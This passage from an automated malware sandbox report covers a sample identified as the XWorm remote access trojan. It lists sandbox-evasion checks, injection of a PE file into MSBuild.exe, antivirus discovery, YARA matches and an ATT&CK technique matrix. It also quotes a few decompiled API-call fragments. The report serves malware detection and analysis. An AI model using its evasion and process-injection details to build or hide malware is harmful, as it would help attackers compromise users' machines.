            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory allocated: ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: B70000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6385Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3468Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe TID: 8904Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe TID: 8892Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8980Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8992Thread sleep count: 6385 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8992Thread sleep count: 3468 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364221402.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: MSBuild.exe, 00000001.00000002.3815168819.0000000000BF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: v4mNsTzbsL.exe, Nums.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: v4mNsTzbsL.exe, Nums.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: v4mNsTzbsL.exe, Nums.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num2, length, 12288, 64)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8D5008Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeQueries volume information: C:\Users\user\Desktop\v4mNsTzbsL.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: MSBuild.exe, 00000001.00000002.3815168819.0000000000C3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: v4mNsTzbsL.exe PID: 8872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8920, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: v4mNsTzbsL.exe PID: 8872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8920, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		311
            Process Injection            		1
            Masquerading            		OS Credential Dumping121
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		12
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory131
            Virtualization/Sandbox Evasion            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin SharesData from Network Shared Drive11
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection            		NTDS13
            System Information Discovery            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA SecretsInternet Connection DiscoverySSHKeylogging112
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.